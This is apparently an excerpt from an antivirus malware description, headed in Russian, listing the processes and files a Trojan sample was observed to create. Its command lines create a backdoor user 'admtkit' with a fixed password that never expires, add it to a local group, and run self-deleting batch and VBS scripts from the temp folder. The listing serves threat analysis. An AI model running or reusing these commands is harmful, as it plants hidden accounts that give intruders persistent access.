Техническая информация
- <SYSTEM32>\wscript.exe modify.vbs
- <SYSTEM32>\cmd.exe /c ""%TEMP%\selfdel0.bat" "
- <SYSTEM32>\net1.exe localgroup %USERNAME%en admtkit /add
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\batchfile.bat" "
- <SYSTEM32>\net1.exe user admtkit $lowd0wn /add /expires:never /passwordchg:yes
- %TEMP%\selfdel0.bat
- %TEMP%\1.tmp\modify.vbs
- %TEMP%\1.tmp\batchfile.bat
- %TEMP%\1.tmp\modify.vbs
- %TEMP%\1.tmp\batchfile.bat